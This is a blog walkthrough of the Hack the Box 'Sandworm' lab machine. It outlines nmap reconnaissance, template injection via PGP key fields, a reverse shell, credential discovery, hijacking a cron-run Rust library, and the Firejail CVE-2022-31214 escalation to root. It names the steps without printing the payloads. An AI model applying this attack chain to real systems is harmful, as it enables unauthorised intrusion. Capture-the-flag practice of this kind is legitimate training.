In this post, I would like to share a walkthrough of the Sandworm Machine from Hack the Box
This room will be considered a medium machine on Hack the Box
What will you gain from the Sandworm machine?
For the user flag, you will need to find the vulnerability on the website that allows users to send and receive PGP-encrypted messages and provides a demonstration area for testing encryption, decryption, and signing functions. Unfortunately, a vulnerability involving server-side template injection has been discovered within the verification demo. Exploiting this flaw could potentially provide access to establish a foothold on the machine
As for the root flag, you only need to abuse the access is confined within a Firejail sandbox. I aim to locate credentials for the subsequent user within an httpie configuration. Subsequently, I plan to alter a Rust program, currently executing on a cron job by the initial user, to regain access to that user but outside the confinement of the Firejail sandbox. Using this access, I intend to exploit the CVE-2022-31214 vulnerability in Firejail, gaining root access
Information Gathering on Sandworm Machine
Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
─[darknite@parrot]─[~/Document/htb/sandworm] └──╼ $nmap -sC -sV 10.10.11.218 -oA initial Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-19 00:09 EDT Nmap scan report for 10.10.11.218 Host is up (0.17s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to https://ssa.htb/ 443/tcp open ssl/http nginx 1.18.0 (Ubuntu) | ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA | Not valid before: 2023-05-04T18:03:25 |_Not valid after: 2050-09-19T18:03:25 |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Secret Spy Agency | Secret Security Service Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 44.42 seconds ┌─[darknite@parrot]─[~/Document/htb/sandworm] └──╼ $
Let’s access the website interface
Nothing look interesting on the website interface
From the contact section, we are presented with encrypted text as shown above.
We are required to create a public key with an encrypted message.
Therefore, let’s create a key by using the command above
We are required to enter a passphrase for the key
We can retrieve the public key by running the command above.
As a result, we can sign the file that we created as shown above.
The screenshot above shows the encrypted message that we can use right now.
Boom! We have SSTI vector attack work as shown above.
Therefore, let’s edit the key by executing the command above.
We should be testing with ‘id’ on the gpg key so that we can ensure the injection work
As we expected, it works like a charm!
We should add our reverse shell command as above.
As done previously, we need to re-sign the encrypted message as above.
At last, we have a reverse shell connection, but it looks like it’s not very stable at all.
We managed to find a credential that we could use to access the machine via SSH service.
We can read the user flag by typing the “cat user.txt” command
Escalate to Root Privileges Access
We managed to find a file called lib.rs which we can abuse later.
Therefore, let’s execute the tipnet that is found on the machine.
By default, we can replace the existing lib.rs file with our modification lib.rs file as shown above.
Boom! At last, we have a reverse shell connection as Atlas privileges access.
While roaming on the machine, we managed to find a file that looked like us which is firejail
As we expected, we can abuse the firejail which assigned as SUID binary
As a result, we should be transferring the exploit into our victim’s machine.
Let’s execute the exploit with the Python3 command
On another reverse shell, we should execute the firejail command
We can read the root flag by running the “cat root.txt” command